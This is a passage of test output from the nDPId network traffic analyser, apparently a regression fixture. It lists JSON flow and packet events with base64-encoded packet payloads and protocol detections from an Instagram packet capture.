AAO9N4sXTDu15V0zXWqS6eeKmgreaCCmgg7uEVJBFpoIqbJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65+hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="}
02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPVyqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqDId1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7440000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"thread_ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1436720950909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950909,"pkt":"QPMIw47hABsv8H60CABFAAWqgMlAAFYGaDQfDVY0wKgAZwBQ42ig4vcaLhm0z4AQADsFTwAAAQEIChPCQpUAA\/8J\/RR\/Qw44auNd5sy65M8X7sSNLvesqLPp\/hWIEgj7u\/c3G33+CGWHr5NjTBvseCa33d9vm54JLq\/16uWtfE8LiAl4wMLDP475fV1R18fJlgWHzmvfo5rv8qseyXDb2HUuXqKoKX0JEHYQ4SCsd7x2l6PL5eytk2f\/kmJp\/iODsxx2N\/N4UQwH1r7vqSLq\/y5DElOXzRARZUzbImejgsz5wOzVgeOngfBrQtGX6fL5DmkthCiZgx4mBvjCvzFR0YP1xM0OXv+CShnIqVrP5zMdqJDyzU483pE+34fsEdDMZT4JhGoy\/98gru4qi0lyXyEksrGabld776ByfJIVVp4RivH8YLNUqtpfCVBnMTiA7j\/sfl7slzSCJaM2S8tAkbhjEusFLl75fI1asIxOiRsWcrVhmx\/PbZlpNd4K8\/v2iJLC1YElBY1y9j56WJc0LPwne+0suiyX3kgj3Fb6y+5RCsQCy2EKLdhWRbyLYVKkL4lX1A\/hBl\/EQkdQU6AhwlzHoU9XC8zrf\/sv+pTGiGgMczA3HQL0c6iXziIlynBHwH6WDIGpFhs4sIl7R4Y0SaCPOZA1lnMfjRJoKCOWKLZc4VEiazWUhaMala+ExIJc2XmtrYy\/iRYyo+LY2ytYUtBbJwRglHwtVOPffxRf4sv1nIag0M0miGXxU6GsLdqvokImfUh+1xnyRB2wekFeanQUhm7KU2GNA\/Wut8I6Yh\/BrGK2ISAtFCkh5uw9+EN15dd79TckDZ5M\/1IXL8vqbu\/hTG\/JfucZfR3dz3L3c+OhdygQW8UzKVOFvvFE3uZQnd322DAH7zC3LRHAXbCjqHBmwf2whhpegjLfm6RfL+z+IzmMokA9e2qfVhZ6xYQdwpjxowXA\/a0hFuEIYBqgg2RBxOTW9B0lNexKZj7L7myCIQt5asMs3OULjIFOSJmLxUIk3Q37w4ymEfVUM4Q7YQrd2Q7D7oXQeE3jsBBmSxiRovqahgnBN4hvIeCZZMLY1uvosfkYR3vNLSiHuKZeam\/RFQJomYqTPcrO3yya\/L8n\/bJvfwlRzHWNuu76VGEBOTSmIQrzPwlvzfa91FS9xmltfjK8v2vivjQ79d9wnDovM7E8heMjng\/L76qTSur9Xu++liqI9lESwcV36\/iMv+UhBAvwlNl9yFOXzTHExcfuKxDjy2WcT\/yjID\/XwdhLUHYsgQ9jzrKZiitJYPrb03G\/4eqDHUUFspftslQp6lFXZbtMgT+PtX+iul7L97VDMHXGdwaI8TzZ6\/jXre8vnY2F+CmIZKNEjnJpMB39UHX\/p7\/3FfZpIUwHcB3IlgFw2RAH5dbcIGzC1nhuJYVIQctqJ04wUFMG9bZhr46HZ73BXAQuUhUW68mxXOEcSUvu6IiD4944qVAoG\/m5vfXCzer8TXXbtxGJy\/lJZWKxmuOzEdM\/69tZAld3d7Oi+E\/\/wSXdP1F9r8RHsvFnMaKa\/Gb3fFq120z5cfUI5ObITs4O5x1e\/k2SP4T55SQ1l\/\/E7jbfd3y\/W+K4YanQb4PNdLvnwtOUEVU10v172Jve733E93FYrd8\/r7COigUu\/j7zMkQoWBxC6yXxRL8fBFpX1\/jifjboOb9QR4q79l+S7kBZXF3dpMduttP55\/mpWYFflzvfd\/Hx+Ie9ijit30tVfYliZvDoVqX8Iibo18xmX2SURsTLcDlv6t9hYNRdUnFiX1r9e4\/4uD+iVcRBUU8hc0fHv5tu\/ghpv97F5dOxeZj2CiEjpYqtM2N6y9Ex9X2v34njvtqIprtcVwGtsEjAY8n2yd95fX6LnY6678J3vfovd9+pLl7ZMl\/\/3mgopvtAOiqdmdl8m1KgVxW1IDqxnD5Yq+7jVsvs"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1436720950910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720950910,"pkt":"ABsv8H60QPMIw47hCABFAAA0TetAAEAGtojAqABnHw1WNONoAFAuGbTPoOL3GoAQH8w2dwAAAQEICgAD\/xATwkKT"}
02380{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1436720950911,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950911,"pkt":"QPMIw47hABsv8H60CABFAAWqgMpAAFYGaDMfDVY0wKgAZwBQ42ig4vyQLhm0z4AYADulrQAAAQEIChPCQpYAA\/8JIuSEmFKcHvUO79IuA4AtgLK1ooHfe\/xvCx6EanjcjDye5qfYfg99btIFMlfpEyS0+WXx48YQQIBKyWOQayb5WbhMWSz8Ru7MV\/a5RJtywzl84iv9BLl6PdqXz3kxPZm4yY8HdjILE3vdfyWVN0pVFaKK+f+Osc32N80bLx0naY6\/StT9w4Neeouf2Tn\/vkhhHb5a5vAV9Sx5efQ\/Fatqq174n5ea7v9ir3vf4yK3Pnlx3v3fywdfv\/ld3jdWI6CQY9xByO962aeABxBaD0Ff8vq65YOluUkGW\/xG5p7nyyq1NumgVeaWXPx2O3qpBCTyam4Mj9KNa9CLu77T788mzfZZLswHVfevJGWxpG6er55a4je67Jde+KzsbHfq771q7M2+z\/WWJw+2E3Gv8+Ffd+tBC77nzd2bXmu\/clj6qf9o8rFbG7XiKrvvv6XxVyXfvsflY+OxHlh7gk3Z3+CHdjx7fieVi8bxm781fQKvN8eNlagx6Pt3\/NOSAfXLBsZ085Sli5c\/HVLg4fEITYcZuYfT1VtMLoUR\/it2aocyhvwSZMTvD5t065r2N7JUsZycS8vq283r4S3bSl8\/xBhG2Ci5YyWnWnN8pxV7z+JfURJd7rip6XefL+Ju6T2Uxe8n5uUueW8j7FWxyhWWeGt2YWoIb6BgT6P7uCHnx\/HwXcNPzZiXBYPY6liIwioP5BO9O7zdXvrl6Ju71WJu93dF9e+W764JLl\/1aJkh+a8yX4S4lMe7dI+73eX7WiDQUaZve75ZfLkLUJX2tpOX0s4hxEi8nbq2h\/\/mvflq9RBfYRrfTdMUcVv5e78i9rwQyT\/Sl\/1zQY9T8g\/Uty51S6PL8o6JLB8VrQkT8ugJnmu83Eyez2e5Qy1+W7Aw4JHINbEb3Lj395YP7YvjhcMBXfvXJ44Z+Ixmnuj5fXvqryZ8aIvNfJRrTESolEZ4VaoKtE96vFFfwld9u321frxC3vvk10K23e7KuXiuSPeX78kEfFYr7eXpJxFpezOY6TshceqnnmzDJNaHyWEjeK+xtg7siFQxNUarW6raVTT\/fwlt3m1+qIhVuJsRCxFdbFXtQf9\/RdIuTCv1R7IUVly5mtgVW\/5h5d378ta7e\/5QkWm71LXLL\/Y\/yuCATBPFbu75ZM1tF4Xr2urFPeZ1jp6PYqu0ysRtkUSKOnvSvJ9F0HEq\/Rr4RDbTxd+7uU\/Q0X5NSa4riJq7\/YqaIUW4dNr2MWX30vRqr09mqvna6y\/VdiohYPHuWzpM\/5V791hHspd591pkzSvTJiOetcEmlGTx05fm5r+E5WPIYg3+Ld5OiDJCb38Xd9ysF92RKCKwntddXfaT3LP\/4K7yaDr4HbV6D7vh8Ru7u\/ShH0gWZxKK93e\/u7nhshKX\/8u99ZHz6WcFOZh7FbiudjfLamk58fUJd3H2j6sTr\/E4xQhYhPxokXSHH53b6EIn4I8kGvoiAAQAAAAAAACAYAavAAAAAgECXIEAAAAAAAAAAAAAAAACAAWcAAAAZwAAAAUAAQABAAAAAIBgBrAAAAACAQJcAQAAAAAAAAAAAAAAAAIABZwAAABnAAAFoQABAAEAAAAAgGAGsQAAAAIBAlwBAAAAAAAAAAAAAAAAAgAFnAAAAGcAAAs9AAEAAQAAAACA4AayAAAAAgECXEEAAAAAAAAAAAAAAAACAAFNAAAAZwAAENkAAQABARggBwEYIAcAABVgQZrjwgqFiDcfxdYWFjNTGhc\/+kWorCzCP06aQacK5fU3p2bDv4QjGkzRtJEnNbVPk\/10ykQi0ZJ4s6VFQ2Ko59C0bD2u1KUtTyS\/\/DlRe1HhoMlOd6CAkkRYQkwPPOx2Ho6SCe9GzaPNROS+"}
00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}}
00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952553,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720952553,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952553,"pkt":"QPMIw47hABsv8H60CABFAAW+RXVAADMGTWwCFuwzwKgAZwBQrHcqB5rC6nVWeIAQAeYA6gAAAQEICmBlKDgAA\/+vNN9ULewTHBOFuxeelHDOvSnlSV1MyHTuCPSU99J+Rb8TuXzL6L8kVMT9JeX\/AEeHJMKvc8yfZQDY5nhAsWaIx3cLbY2ubZRDNurbaUASgAZ45AKigq45hruCoLni5pLmg59eiPd\/MiN87txVNMyFgkWsWfkcvPvLq3ncGqOJteWDTNpm8JnDNe\/V0S2KHy+GaSkVk8YYmWOQdL4xuwexnBqduXqVc8IuuI9MY+Zt8cnTPcsfLLIlpNfPzE+aRdsInsLztgb98N0mNzOHWHNTZrWKQPr9F5EE8pK7KRl773oe+7TTr1byuTp17xSTo5toqt17OaKtyATyBsMufY15yTPDfHSZYsAADIDSioIAAAHiqKF1TXzn1tX21U6idxttVoiynCqd8u3uesClb\/XTWQXOtPYUXP50lMJRzX9QM7C64zEeROD4ZaaRjli0mWIjfY1adjPenj65KGzqNXJTVghI+6I9UuSYsusH3FlxFno1c9JW3qbWRHfo32lBRAAGeChkqKC5IoYXnRl6Z3L5dCnLn26mSNOSOlqcea5o+UReR652+3d2\/Dab0zb9PXGqPSSLVDbNYRN6MtmpYbJEJLFdJ2RaURdiZY5h0OrU5h7IeY888nVsXnwm4oxv7JWfA68vLc8ehxYrmuOvDGouaBzaCTVP8+zXrnlnrxCWO9ezKKfpVjom7FpO6KTzNl60JdWhqz19c1yubV3UpRimqVV2W9Iuz4HPYBS04ZbGvOuvLXvjiZYsyxAFADSAAAIAHiqKCLcMvDzel9taKZLs5gp0t2Sh58L9ypUAXrhU0aeiss785JfFQgziXCyntnoKqRxzXlrlhljpCKihlu1P7THj6681RUYywmYQzKyhFbllawrlLFUK21TYahBMm4bB0c\/Q0qorQAApkAqZAqooYd7fNpcf2zJkmmfqN4IOKohvY2dlqWGThFbWF\/iVS78WnnJ2uDHuZI98fVGcac2Zm9mcm1UZY5ht7uDaF69Ec7stO3DjzT4G5waWu1vkbTUs3N04NR5d+uk9NE0xVVXqfWMDHPBz3TyJ2pj1SeiHvpcNbNaNfVk2d++zGVKltAVHjbncFMYehMEedktrQOr+f0lWrmtUm+5kDyFpIAAACABpAAAEADxUAvSVxiQ0ufh6dafDwdvPJvem8y03645umpEvJ0dXO8bOVZrlo6+6HRHb0ou72TKnrj5KPN7\/AOgKGio1hlhcLnqyF3+tvLXsSbkfin2t4tioTO4NYFQ\/cjnql8XXv1hza9+0Ud7jZRwM7yzJxDp5um5UBpRFBRFDJUAyXHIMLhp62c7n0OsJjy0iGfHrFKd3PzhU8hjD\/pFzODc\/Y6udSW9S1xmy97TUsc6rydtdS82Etsi8jjdrKKSuKgmeOTOnu4nJHsh6YHzk6+ZUwTisdkMdqJMzvOrXOshOkK636OrSLZYJJHZcArm2apudeK4tWc27cstemRx+TikdR37SEPju+kLssw2Gc1wOvJ2hIdaYk1zq07Iu2KUuuldIaeHl165wzJM2tQDAAEFA0ACABgAIKiLtm1f2FaZdGxIrg19HJLzj8n4Ypnc+B3T5H9i6KUpcY+86xxUVeVESMl8UPe1Kc82\/VTk3j\/1J5ak58ckqUUUN\/rfyR6eHcXir2n4sx0h9l1nO6iWmGyLxxNiNJu0g3Ybk0hqbHRqCIdPN0XOQitAAKqALljkCrjkGF2Uncud2zD5hCufWAuzR3tSLQmaqnX6OSXbK53hgkuOsgpG7qQpZRqSR+oidlVpZdTrxXdIxxKXxG1ojMpizEzxzZ0OrW7I9gvrG+cnXo1beEccjsojNZyrk6C5qrW4NVKD9vH1VFwxWVxccbqS2Yg5iCSbQN4k01rSK6ZNFZW1N6VuWn84="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952553,"pkt":"ABsv8H60QPMIw47hCABFAAA0quZAAEAG4ITAqABnAhbsM6x3AFDqdVZ4KgegTIAQAtavfwAAAQEICgAD\/7RgZSg4"}
02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1436720952555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952555,"pkt":"QPMIw47hABsv8H60CABFAAW+RXZAADMGTWsCFuwzwKgAZwBQrHcqB6BM6nVWeIAQAeZ8mQAAAQEICmBlKDgAA\/+vtV20fc9mrp1dM1zdmjppSPVtJK34O3VnVq0beVF65xNDXtnFMscw0gMAAAA0IoJBUBRFARUHcs5g82pbGbtawVs6OSKR1bUyvV0dTgqje3NxuXVMt1wlAegfPgme8KPvNkyz2Nzpho206rca8VQBcVDdd9H2q16p8Xe1\/FGG0PnMFm95yjbzbc7y6uXqTNGzWHDjlr1zbmh3aAiPRz9FJQBKIrBUUFyxyAyxUMbqpW7M7s+HSqN8+tay6O9jTtj28wUzIo\/I9c7sc2SRY7SGir2ou5wYpBHamL2VXdh1GOfOiG2KSWK0ZRWURgMc8c2dLwzO6PYryxPPJ14tXbyVLEzu7AiS6csbmt9Otxqax6NG+4uWLSiIMYORwY5GrXsyVyji63ZEef2CRuZlT9tVLFa7rpa4rN2GvKa6elt72n7oBKscxMtLQoy7qN1yh+eGrfONLhtDQAwAAEA0gCRQARQaoCLnm9fzqjnZ3VrTw09XILe19+jPTt59nHFRbU0OOuNydnD0UHny+qEQy39QN7UThl7edlc1nfdBowRUELhmGc+r+yWewvFPtPxXnpDZ1BZmRK8zLPQ38W8W\/X1YhH8M9eufC2d\/AOI79G+kqiNKqKAqKC5YqC5IoY3XSd0Z3Y8akkew1rnv4HkTku3FOmJHHJJtncsjjclx1kPn70JQGkcLY6tNQ0zKJTVjWvXtSZIzLIrSwjEmjQ8c8c2dDq1OqPYLu39fJ1betucGQOPuDRUSXa1cLIpt3N2mddd7Y5VNmsbw2Da2\/vbQiUjZHiNOuRQ2ZSRqRNXXUTanbbp9PbdNN2jY6tLkwRT\/ANjbmOa9UE6Uotjv45c4hUhaamqOkXoyhy4okgDYACCgaABAAIoAADuWUw2fta4zKI7NJxuGVLi29HLne+NvcdlxB1aHHXK2+xtdVSUBfVAg1XrRV5tTjh624ct8i+wPNScORUqMc8Mwy9A0D69VT7xd7V8U53E5jD5vecyw6sYrVuz2BjjtWSJ8nbzbRwtr0xDjG\/RvaURWshFABQXLDMBUUMbnpi4stLLjsnZ8NankEdmWkdab9Muk5DH3nTO4pEwOWG8yo2aQrXLjZXdiuNM0hcyDVu59yGWKyiLXOcZkMeVY7MM2dDs0OqPZPZydXJ159bc5NQmJyqJ1n3Y9HE20x57YdM68dmx\/qZ\/xubZFscff4rR1u4z59Nv1lM66iJZ3x2S6YP1M3XSpWVsVDbdy6xp4Yopxy1ire9NXUDdH5QwofuPrbhV5y8si6MKyVFHiAwABRANQgJRFAEAFRQtucQmaM4mXub5p95Oznuefj688r5I9Io3NRJy4pPrlN+ht2Ku6h\/QXn5ptuulbZCyuVgkTcvo6\/Kxzrz2meGueGWOSOn3F4n9xzTh4w9X+ac6rWdQ67Ljk1S7rhwtJ3i1X+cw4WoLju5KMI5Io4ONbtW2kog1kACqiguWGYCooYz6ATTO7t5HXhw1qebQF2qZdp0cidTv0Xe9srme4048++yBSFg0z42SRtNxxS2IytrHPX1Ij8Vk7Fa5o\/JWGa5s9+xmDrx9qPYDw1O\/L1a89e2KisZlDBefSxSPipRRjkzbpFVvfK43E7weGqLi0clcfofITO4hnvIobM4rryyF2jrvNWRSt60dFarYqu52R3e5aM9G\/a4brng6ZBkiCt702S5fDbSrWoq\/NToyhaKjMRAFBAUANYAkUAEUBFQHbM3h00ta4zJY\/J3bGvNV08O1ZZGZNGYqLS2JzrXKQObG9Rfd54v2gqlsvGjrpY\/dvL3jmUMnMFz0834bMNsda54g8+w\/HfreHt8+XvQ8OvrspC67h\/dIPKIblw4peerNFqYI1OTSaIwPLKqjmzXmxQGlXFQVcVBVxyBVxUM4="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAABZAuBAAEAGAfDAqABnLiFGn+VCAbsSlgM32Tfr4YAYA4n5fAAAAQEICgAD\/7VWGIoUFQMBACAs4KplPbzXnvu9o5LJf4SK8seDxrub6gsxIshtI3HaOA=="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"}
02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR